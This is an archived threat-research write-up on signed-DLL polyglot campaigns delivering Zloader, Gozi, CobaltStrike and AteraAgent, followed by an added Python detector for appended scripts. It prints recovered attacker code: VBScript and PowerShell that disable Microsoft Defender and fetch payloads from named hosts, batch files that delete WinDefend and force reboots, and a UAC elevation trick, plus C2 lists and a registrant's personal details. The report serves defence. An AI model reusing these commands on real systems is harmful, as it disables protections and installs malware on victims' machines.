{
	"id": "6b838f39-d8bb-41c8-9a19-7217023f4f59",
	"created_at": "2026-04-06T00:15:13.351147Z",
	"updated_at": "2026-04-10T03:21:53.617205Z",
	"deleted_at": null,
	"sha1_hash": "16a8646f36adaf01baff3f7e2dcdf543ea25b373",
	"title": "Signed DLL campaigns as a service",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1330780,
	"plain_text": "Signed DLL campaigns as a service\r\n
By Jason Reaves\r\n
Published: 2022-01-11 · Archived: 2026-04-05 22:52:03 UTC\r\n
By: Jason Reaves and Joshua Platt\r\n
Recently an actor has begun embedding VBScript at the end of Microsoft-signed DLLs in order to GPG-decrypt and then detonate payloads. While we were writing up our research, another article on this was released by CheckPoint[7][8], but we feel there are enough pieces from our own research to add to the story.\r\n
This concept has been discussed before using various file types and is normally referred to as ‘polyglotting’, for example with lnk files[2] and by appending data to PE files[1]. For these campaigns the actor used Microsoft-signed DLLs and abused a code-signing check bug in an attempt to bypass security controls.\r\n
https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\n
Page 1 of 16\r\n
The campaigns related to Zloader have also been discussed previously[3], so we will focus on the updates and differences in the more recent campaigns.\r\n
Campaign\r\n
The campaign has multiple components, but the goal is ultimately to detonate malware. The payloads we went over include the following:\r\n
AteraAgent RAT\r\n
Zloader\r\n
Gozi\r\n
CobaltStrike\r\n
As mentioned in the SentinelOne article[3], these campaigns still begin with fake installers. In the more recent campaigns we investigated, the packages were built with AdvancedInstaller and then kick off the detonation of the various components.\r\n
The follow-up components handle various setup tasks, such as adding Microsoft Defender exclusions for msiexec, using VBScript code appended to Microsoft-signed binaries:\r\n
\u003cscript LANGUAGE=\"VBScript\"\u003e\r\n
Set WshShell = CreateObject 
(\"WScript.Shell\")\r\n
WshShell.run \"cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command\r\n
WshShell.run \"cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command\r\n
WshShell.run \"cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command\r\n
WshShell.run \"cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command\r\n
WshShell.run \"cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -MAPSReporting 0\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'regsvr32'\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'rundll32.exe'\",\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'rundll32*'\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionExtension '.exe'\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'regsvr32*'\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess '.dll'\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess '*.dll'\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -PUAProtection disable\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disab\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableRealtimeMonitoring $true\",\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableBehaviorMonitoring $true\",\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableIOAVProtection $true\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisablePrivacyMode $true\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -SignatureDisableUpdateOnStartupWit\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableArchiveScanning $true\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableIntrusionPreventionSystem $\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableScriptScanning $true\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -SubmitSamplesConsent 2\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess '*.exe'\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'explorer.exe'\",\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess '.exe'\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -HighThreatDefaultAction 6 -Force\"\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -ModerateThreatDefaultAction 6\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -LowThreatDefaultAction 6\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -SevereThreatDefaultAction 6\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -ScanScheduleDay 8\", 0\r\n
WshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'msiexec.exe'\", 0\r\n
window.close()\r\n
\u003c/script\u003e\r\n
Along with installing GPG for use from PowerShell:\r\n
function Install-GnuPg {\r\n
 \u003c#\r\n
 .SYNOPSIS\r\n
 This function installed the GnuPg for Windows application. It the installer file is not in\r\n
 the DownloadFolderPath, the function will download the file from the Internet and then execute a si\r\n
 .PARAMETER DownloadFolderPath\r\n
 The folder path where you'd like to download the GnuPg for Windows installer into.\r\n
$uri = 'https://\r\n
$moduleFolderPath = 'C:\\Program Files\\WindowsPowerShell\\Modules\\GnuPg'\r\n
$null = New-Item -Path $moduleFolderPath -Type Directory\r\n
Invoke-WebRequest -Uri $uri -OutFile (Join-Path -Path $moduleFolderPath -ChildPath 'GnuPg.psm1')\r\n
$env:APPDATA\r\n
Install-GnuPG -DownloadFolderPath $env:APPDATA\r\n
echo \"START\"\r\n
The script also performs some interesting checks to estimate the likelihood of running inside an enterprise environment: whether the machine is domain-joined (the domain differs from both the hostname and WORKGROUP) and whether the ARP table holds at least two entries in private address ranges:\r\n
$MaxIPToSendRequest = 2\r\n
$UserDomain = wmic computersystem get domain\r\n
$UserDomain = $UserDomain[2]\r\n
$UserDomain = $UserDomain.trim()\r\n
$UserPCname = $env:computername\r\n
$UserPCname = $UserPCname.trim()\r\n
Write-Host 'UserDomain = '$UserDomain\r\n
Write-Host 'UserPCname = '$UserPCname\r\n
$Condition001 = ($UserDomain -ne $UserPCname)\r\n
$Condition002 = ($UserDomain -ne \"WORKGROUP\")\r\n
$ArpInfo = arp -a\r\n
$arr1 = $ArpInfo | select-string \"192.1\r\n
 $arr1_count = $arr1.length\r\n
 #Write-Output $arr1\r\n
 $arr2 = $ArpInfo | select-string \"10.(\\d{1,3}).\\d{1,3}(\\.\\d{1,3})(.)*(\\w\\w-\r\n
 $arr2_count = $arr2.length\r\n
 #Write-Output $arr2\r\n
 $arr3 = $ArpInfo | select-string \"172.(\\d{1,3}).\\d{1,3}(\\.\\d{1,3})(.)*(\\w\\w\r\n
 $arr3_count = $arr3.length\r\n
 #Write-Output $arr3\r\n
 $IP_count = $arr1_count + $arr2_count + $arr3_count\r\n
Write-Host 'IP_count =' $IP_count\r\n
$Condition003 = ($IP_count -ge $MaxIPToSendRequest)\r\n
$Condition_All =\r\n
These checks determine which malware gets installed. If all conditions are met, and the script is therefore likely inside an enterprise, this instance installs CobaltStrike and the AteraAgent RAT; otherwise it installs Gozi or Zloader.\r\n
if ($Condition_All )\r\n
{\r\n
 $URL = \"https://cloudfiletehnology.com/z00m/index/processingSetRequestCoba/?servername=msi\u0026a\r\n
 Invoke-WebRequest https://cloudfiletehnology.com/z00m/index/processingSetRequestBat5/?servername=ms\r\n
 Invoke-WebRequest https://cloudfiletehnology.com/z00m/index/processingSetRequestBat6/?servername=ms\r\n
 Invoke-WebRequest $URL -outfile zoom2.dll.gpg\r\n
 Invoke-WebRequest https://cloudfiletehnology.com/z00m/index/processingSetRequestAtera/?servername=m\r\n
}\r\n
else\r\n
{\r\n
 $URL = \"https://cloudfiletehnology.com/z00m/index/processingSetRequestBot/?servername=msi\u0026arp=\"+ $IP_\r\n
 Invoke-WebRequest https://cloudfiletehnology.com/z00m/index/processingSetRequestBat5/?servername=ms\r\n
 Invoke-WebRequest https://cloudfiletehnology.com/z00m/index/processingSetRequestBat6/?servername=ms\r\n
 Invoke-WebRequest $URL -outfile zoom.dll.gpg\r\n
}\r\n
From here it runs multiple batch files in sequence. You may also notice that a number of DLL files are downloaded; these are normally Microsoft-signed DLLs with VBScript code appended.\r\n
PE Polyglot Technique\r\n
Some of these abused DLLs have 0 detections on VirusTotal:\r\n
(Figure: screenshot from VirusTotal)\r\n
If we look at the file data, however, we can see that VBScript code has been appended to the file: the tail of the file is a run of null bytes followed by the script.\r\n
Prettier version of just the VBScript:\r\n
\u003cscript LANGUAGE=\"VBScript\"\u003e\r\n
Set WshShell = CreateObject (\"WScript.Shell\")\r\n
Sub Sleep (ms)\r\n
 Set fso = CreateObject(\"Scripting.FileSystemObject\")\r\n
 Dim sFilePath: sFilePath = fso.GetSpecialFolder(2) \u0026 \"\\WScriptSleeper.vbs\"\r\n
 If Not fso.FileExists(sFilePath) Then\r\n
 Set oFile = fso.CreateTextFile(sFilePath, True)\r\n
 oFile.Write \"wscript.sleep WScript.Arguments(0)\"\r\n
 oFile.Close\r\n
 End If\r\n
 Dim oShell: Set oShell = CreateObject(\"WScript.Shell\")\r\n
 oShell.Run sFilePath \u0026 \" \" \u0026 ms, 0, True\r\n
End Sub\r\n
Sleep (45000)\r\n
WshShell.run \"cmd.exe /c PowerShell -NoProfile -ExecutionPolicy Bypass -command Import-Module GnuPg;\r\n
Sleep (45000)\r\n
WshShell.run \"cmd.exe /c zoom1.msi\", 0\r\n
WshShell.run \"cmd.exe /c rundll32.exe zoom.dll DllRegisterServer\"\r\n
WshShell.run \"cmd.exe /c mode.exe\", 0\r\n
window.close()\r\n
\u003c/script\u003e\r\n
This DLL is meant to be executed by mshta.exe, which then decrypts and detonates the files. The detonation piece uses batch files, as mentioned above. Example:\r\n
e3d7f1af2bc790cf143827d2335b594dc3d54a0f49cb61e0b8d6a2d1f0ad27cb\r\n
cd %APPDATA%\r\n
 start /b cmd /c C:\\Windows\\System32\\mshta.exe %APPDATA%\\appContast.dll\r\n
 start /b cmd /c C:\\Windows\\System32\\mshta.exe %APPDATA%\\apiicontrast.dll\r\n
 powershell Invoke-WebRequest https://commandaadmin.com/adminpriv.exe -OutFile adminpriv.exe\r\n
 adminpriv -U:T -ShowWindowMode:Hide reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX\r\n
 adminpriv -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Polic\r\n
 adminpriv -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Polic\r\n
 adminpriv -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Polic\r\n
 adminpriv -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Polic\r\n
 powershell.exe -command \"Add-MpPreference -ExclusionExtension \".bat\"\"\r\n
 adminpriv -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No\r\n
 adminpriv -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures\r\n
 adminpriv -U:T sc config WinDefend start= disabled\r\n
 ping 127.0.0.1 -n 50 \u003e nul\r\n
 powershell Invoke-WebRequest https://commandaadmin.com/reboos.dll -OutFile reboos.dll\r\n
 cd %USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\r\n
 powershell Invoke-WebRequest https://commandaadmin.com/auto.bat -OutFile auto.bat\r\n
 powershell.exe New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\sys\r\n
 shutdown\r\n
 shutdown /s /f /t 01\r\n
 shutdown /s /f /t 00\r\n
 shutdown /s /f\r\n
For this instance adminpriv is NSudo[4], used to run the Defender and boot-configuration tampering as TrustedInstaller, and reboos.dll detonates a separate DLL using the same trick with mshta.exe:\r\n
\u003cscript LANGUAGE=\"VBScript\"\u003e\r\n
Set WshShell = CreateObject (\"WScript.Shell\")\r\n
WshShell.run \"cmd.exe /c rundll32.exe zoom2.dll DllRegisterServer\", 0\r\n
WshShell.run \"cmd.exe /c regsvr32 zoom.dll\", 0\r\n
window.close()\r\n
\u003c/script\u003e\r\n
The downloaded batch file auto.bat from above, dropped into the Startup folder so it runs after the forced reboot, also leverages adminpriv, which we mentioned is NSudo[4]:\r\n
adminpriv -U:T -ShowWindowMode:Hide sc delete windefend\r\n
It also executes other VBS code, which lines up with the previous work by SentinelOne[3]:\r\n
:UACPrompt\r\n
 echo Set UAC = CreateObject^(\"Shell.Application\"^) \u003e \"%temp%\\getadmin.vbs\"\r\n
 set params = %*:\"=\"\r\n
 echo UAC.ShellExecute \"cmd.exe\", \"/c %~s0 %params%\", \"\", \"runas\", 0 \u003e\u003e \"%temp%\\getadmin.vbs\"\r\n
 \"%tem\r\n
 del \"%temp%\\getadmin.vbs\"\r\n
 exit /B\r\n
And finally we can see it detonate the code appended to the DLL using mshta:\r\n
start /b cmd /c C:\\Windows\\System32\\mshta.exe %APPDATA%\\apiicontrast.dll\r\n
The zoom file for this instance turns out to be an AteraAgent installer:\r\n
b6280ee7d58b89b0951f08aabe64f1780887bf360e8a725e4269675398ebad65\r\n
Plushkinloder9@yandex.ru\r\n
The email associated with the Atera installer was also used for a domain registration. The Registrant, Admin and Tech contacts are identical (the Admin and Tech records additionally list the phone number as fax):\r\n
Registry Registrant ID: reg-a6r6lkbkoh64\r\n
Registry Admin ID: reg-zsnzthxfekkq\r\n
Registry Tech ID: reg-v8bnf870ivb6\r\n
Name: Alexey Samoylov\r\n
Organization: Private Person\r\n
Street: sadovaya 14\r\n
City: oktyaborskiy\r\n
State/Province: Ulyanovskaya\r\n
Postal Code: 433407\r\n
Country: RU\r\n
Phone: +7.9260229351\r\n
Email: plushkinloder9@yandex.ru\r\n
At least one campaign server from the December campaigns was still online during our research:\r\n
(Figure: installer campaign panel login)\r\n
This is a sold service and can be linked to a crew we have previously discussed, ConfCrew[6].\r\n
Campaign stats\r\n
Campaigns began in May 2021 and run through December 2021:\r\n
(Figure: infections by month in 2021)\r\n
The infections are primarily located in the US and Europe but cover a wide range of places geographically:\r\n
(Figure: infections by geolocation)\r\n
Malware Config Extraction\r\n
This Zloader is the newer version; its config is simply RC4-encrypted with a hardcoded key, as Hasherezade described previously[5]. Because RC4 is a stream cipher, encrypting null bytes yields the raw keystream, so we can abuse the NULL values inside the internal configuration to locate the encrypted config once we have found the key:\r\n
import re\r\n
from Crypto.Cipher import ARC4  # pycryptodome\r\n
\r\n
# data: the unpacked Zloader binary as bytes\r\n
# The hardcoded key is a long run of lowercase letters inside the binary\r\n
config_key = re.findall(rb'[a-z]{20,}', data)\r\n
After finding the key we can find the encrypted config by looking for 16-byte chunks of the 256-byte keystream (the result of encrypting 256 null bytes). A hit tells us the general area where the encrypted config lives, which turns this into a bruteable problem.\r\n
if len(config_key) \u003e 0:\r\n
    # Take the first candidate key\r\n
    key = config_key[0]\r\n
    # Encrypting nulls with RC4 returns the keystream itself, so any 16-byte\r\n
    # slice of it appears verbatim wherever the config holds 16 null bytes\r\n
    temp = b'\\x00' * 256\r\n
    rc4 = ARC4.new(key)\r\n
    needle = rc4.encrypt(temp)\r\n
    offsets = []\r\n
    for i in range(256 // 16):\r\n
        chunk = needle[i * 16:(i + 1) * 16]\r\n
        if chunk in data:\r\n
            offsets.append(data.find(chunk))\r\n
    if len(offsets) \u003e 0:\r\n
        # Take the first occurrence\r\n
        off = min(offsets)\r\n
        # Create a bruteable window: 4 KiB either side, clamped to the file start\r\n
        blob = data[max(0, off - (1024 * 4)):off + (1024 * 4)]\r\n
Now we just brute-force the start offset until a known plaintext string appears:\r\n
        for i in range(len(blob)):\r\n
            rc4 = ARC4.new(key)  # RC4 restarts from byte 0 of the keystream each time\r\n
            test = rc4.decrypt(blob[i:])\r\n
            if b'http://' in test or b'https://' in test:\r\n
                print('Found it')\r\n
                print(test)\r\n
                break\r\n
Zloader internal config:\r\n
CAMPAIGN: vasja\r\n
C2: https://iqowijsdakm.com/gate.php\r\n
https://wiewjdmkfjn.com/gate.php\r\n
https://dksaoidiakjd.com/gate.php\r\n
https://iweuiqjdakjd.com/gate.php\r\n
https://yuidskadjna.com/gate.php\r\n
https://olksmadnbdj.com/gate.php\r\n
https://odsakmdfnbs.com/gate.php\r\n
https://odsakjmdnhsaj.com/gate.php\r\n
https://odjdnhsaj.com/gate.php\r\n
https://odoishsaj.com/gate.php\r\n
C2_KEY: 03d5ae30a0bd934a23b6a7f0756aa504\r\n
Pivoting on the C2 key turns up many more campaigns by this actor. Every one of them carries the same C2_KEY (03d5ae30a0bd934a23b6a7f0756aa504), and all but one use the same ten C2 URLs as vasja; campaign names repeat where several samples share one:\r\n
CAMPAIGN: personal (C2 list: same as vasja)\r\n
CAMPAIGN: googleaktualizacija (C2 list: same as vasja)\r\n
CAMPAIGN: buldog (C2 list: same as vasja)\r\n
CAMPAIGN: personal (C2 list: same as vasja)\r\n
CAMPAIGN: 9092ge (C2 list: see below)\r\n
CAMPAIGN: googleaktualizacija (C2 list: same as vasja)\r\n
CAMPAIGN: tim (C2 list: same as vasja)\r\n
C2 list for 9092ge:\r\n
https://asdfghdsajkl.com/gate.php\r\n
https://lkjhgfgsdshja.com/gate.php\r\n
https://kjdhsasghjds.com/gate.php\r\n
https://kdjwhqejqwij.com/gate.php\r\n
https://iasudjghnasd.com/gate.php\r\n
https://daksjuggdhwa.com/gate.php\r\n
https://dkisuaggdjhna.com/gate.php\r\n
https://eiqwuggejqw.com/gate.php\r\n
https://dquggwjhdmq.com/gate.php\r\n
https://djshggadasj.com/gate.php\r\n
CobaltStrike was also found to be leveraged by this actor in enterprise environments (config extract, truncated in the source):\r\n
{'SPAWNTO_X64': '%windir%\\\\sysnative\\\\dllhost.exe', 'SLEEPTIME': '45000', 'C2_VERB_GET': 'GET', 'Proc\r\n
Gozi:\r\n
{\r\n
 \"DLL_32\": {\r\n
 \"CONFIG_FAIL_TIMEOUT\": \"20\",\r\n
 \"VER\": \"131353\",\r\n
 \"UNKNOWN\": \"\",\r\n
 \"DGA_COUNT\": \"10\",\r\n
 \"TIMER\": \"0\",\r\n
 \"CRC_HOSTS\": \"google.mail.com firsone1.online kdsjdsadas.online\",\r\n
 \"CRC_URI_EXT\": \".bmp\",\r\n
 \"CRC_URI\": \"/jkloll/\",\r\n
 \"CRC_SERVERKEY\": \"01026655AALLKENM\",\r\n
 \"MD5\": \"1c362dcf0fe517a05952caf90ae1d992\",\r\n
 \"CRC_SERVER\": \"12\",\r\n
 \"IMPHASH\": \"0d41e840891676bdaee3e54973cf5a69\",\r\n
 \"PUB_KEY\": \"f9ccfec396940a0f3ba99d0043ae8c9a5df54fde98c1596c974533e2050fbd92623d802012d8c5f00\r\n
 \"SHA256\": \"5d80327decb188074a67137699e5fccdc3a8b296a931ddf20d37597cebb4d140\",\r\n
 \"CONF_TIMEOUT\": \"10\",\r\n
 \"CRC_GROUP\": \"9090\"\r\n
 }\r\n
}\r\n
IOCs\r\n
Installer system:\r\n
cloudfiletehnology.com\r\n
zoomdownloab.site\r\n
pornofilmspremium.com\r\n
datalystoy.com\r\n
cmdadminu.com\r\n
teambatfor.com\r\n
clouds222.com\r\n
commandaadmin.com\r\n
Installer panel traffic patterns:\r\n
/processingSetRequestBat1/?servername=\r\n
/processingSetRequestBat2/?servername=\r\n
/processingSetRequestBat3/?servername=\r\n
/processingSetRequestBat4/?servername=\r\n
/processingSetRequestBat5/?servername=\r\n
/processingSetRequestBat6/?servername=\r\n
/processingSetRequestBot/?servername=\r\n
/processingSetRequestCoba/?servername=\r\n
/processingSetRequestDownload/?servername=\r\n
/processingSetRequestAtera/?servername=\r\n
Gozi:\r\n
firsone1.online\r\n
kdsjdsadas.online\r\n
Zloader:\r\n
eiqwuggejqw.com\r\n
yuidskadjna.com\r\n
iweuiqjdakjd.com\r\n
odsakmdfnbs.com\r\n
odjdnhsaj.com\r\n
djshggadasj.com\r\n
dquggwjhdmq.com\r\n
kjdhsasghjds.com\r\n
lkjhgfgsdshja.com\r\n
iqowijsdakm.com\r\n
dkisuaggdjhna.com\r\n
dksaoidiakjd.com\r\n
iasudjghnasd.com\r\n
odsakjmdnhsaj.com\r\n
asdfghdsajkl.com\r\n
wiewjdmkfjn.com\r\n
olksmadnbdj.com\r\n
daksjuggdhwa.com\r\n
kdjwhqejqwij.com\r\n
odoishsaj.com\r\n
CobaltStrike:\r\n
jersydok.com\r\n
References\r\n
1: http://blog.sevagas.com/?Hacking-around-HTA-files\r\n
2: https://hatching.io/blog/lnk-hta-polyglot/\r\n
3: https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/\r\n
4: https://github.com/M2Team/NSudo\r\n
5: https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf\r\n
6: https://www.sentinelone.com/labs/valak-malware-and-the-connection-to-gozi-loader-confcrew/\r\n
7: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/\r\n
8: https://www.bleepingcomputer.com/news/security/microsoft-code-sign-check-bypassed-to-drop-zloader-malware/\r\n
Source: https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
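	"added_examples": "Added example for the PE Polyglot Technique section above. This is the editor's own Python, not code from the original post and not the actors' tooling. It parses the PE header by hand, works out where the last section's raw data ends, reads the Authenticode certificate table location from the security data directory, and reports whether a VBScript marker (the <script LANGUAGE=VBScript> tag seen in the appended code) appears past the sections and, if so, whether it lies inside the declared certificate table (a region the Authenticode hash does not cover, which is why an inflated table leaves the signature intact) or outside it (a hashed region, so the signature would no longer verify). The minimal PE image, its section and certificate offsets, and the appended script are all constructed here for the demonstration; a real sample is checked by passing its bytes to overlay_report.

```python
# Added example, not code from the original post: locate data hidden past a
# PE file's last section (where the appended VBScript lives) and say whether
# it sits inside the declared Authenticode certificate table.
import struct

QUOTE = bytes([0x22])                      # the double-quote character
VBS_MARKER = b'<script LANGUAGE=' + QUOTE + b'VBScript' + QUOTE + b'>'


def pe_layout(data):
    # Returns (end of the last section's raw data, cert table file offset, cert table size).
    if data[:2] != b'MZ':
        raise ValueError('missing MZ header')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE' + bytes(2):
        raise ValueError('missing PE signature')
    coff = e_lfanew + 4
    num_sections = struct.unpack_from('<H', data, coff + 2)[0]
    opt_size = struct.unpack_from('<H', data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from('<H', data, opt)[0]
    # Data directories start at 0x60 (PE32) or 0x70 (PE32+); entry 4 is the
    # security directory, whose VirtualAddress is a raw file offset, not an RVA.
    dirs = opt + (0x60 if magic == 0x10B else 0x70)
    cert_off, cert_size = struct.unpack_from('<II', data, dirs + 4 * 8)
    sections = opt + opt_size
    end = 0
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from('<II', data, sections + i * 40 + 16)
        end = max(end, raw_ptr + raw_size)
    return end, cert_off, cert_size


def overlay_report(data):
    end, cert_off, cert_size = pe_layout(data)
    cert_end = cert_off + cert_size if cert_size else 0
    tail = data[end:]                       # everything past the last section
    hit = tail.find(VBS_MARKER)
    script_off = end + hit if hit >= 0 else -1
    if script_off < 0:
        where = 'none'
    elif cert_size and cert_off <= script_off < cert_end:
        # Bytes inside the certificate table are excluded from the Authenticode
        # hash, so a script parked here leaves the signature intact.
        where = 'inside_cert_table'
    else:
        # Hashed region: the signature would no longer verify, so this is a
        # plain overlay rather than the signature-preserving trick.
        where = 'outside_cert_table'
    return {'sections_end': end, 'cert_table': (cert_off, cert_size),
            'tail_bytes': len(tail), 'script_offset': script_off,
            'script_location': where}


def build_sample(appended, inflate_cert_table):
    # Constructed minimal PE32 image: one .text section at 0x200, a dummy
    # WIN_CERTIFICATE blob at 0x400, then whatever is appended. When
    # inflate_cert_table is set the directory size is stretched to cover the
    # appended bytes, mimicking the signed polyglots described in the post.
    img = bytearray(0x500)
    img[0:2] = b'MZ'
    struct.pack_into('<I', img, 0x3C, 0x40)
    img[0x40:0x44] = b'PE' + bytes(2)
    struct.pack_into('<HHIIIHH', img, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)
    opt = 0x58
    struct.pack_into('<H', img, opt, 0x10B)
    cert_size = 0x100 + (len(appended) if inflate_cert_table else 0)
    struct.pack_into('<II', img, opt + 0x60 + 4 * 8, 0x400, cert_size)
    sect = opt + 0xE0
    img[sect:sect + 8] = b'.text' + bytes(3)
    struct.pack_into('<IIII', img, sect + 8, 0x200, 0x1000, 0x200, 0x200)
    img[0x200:0x400] = bytes([0x90]) * 0x200
    struct.pack_into('<IHH', img, 0x400, cert_size, 0x200, 2)  # dwLength, wRevision, wCertificateType
    return bytes(img) + appended


if __name__ == '__main__':
    script = bytes(16) + VBS_MARKER + b'WshShell.run cmd.exe</script>'
    for inflate in (True, False):
        print(overlay_report(build_sample(script, inflate)))
```

Get-AuthenticodeSignature or signtool verify can still report the signature on such a file as valid unless the stricter certificate-padding check from MS13-098 (the opt-in EnableCertPaddingCheck registry value) is enabled on the verifying host, so this tail check should accompany the signature verdict rather than be replaced by it; a script tag anywhere past the sections is never part of a legitimate build, whichever location the report assigns it.",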
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489"
	],
	"report_names": [
		"signed-dll-campaigns-as-a-service-7760ac676489"
	],
	"threat_actors": [],
	"ts_created_at": 1775434513,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/16a8646f36adaf01baff3f7e2dcdf543ea25b373.pdf",
		"text": "https://archive.orkl.eu/16a8646f36adaf01baff3f7e2dcdf543ea25b373.txt",
		"img": "https://archive.orkl.eu/16a8646f36adaf01baff3f7e2dcdf543ea25b373.jpg"
	}
}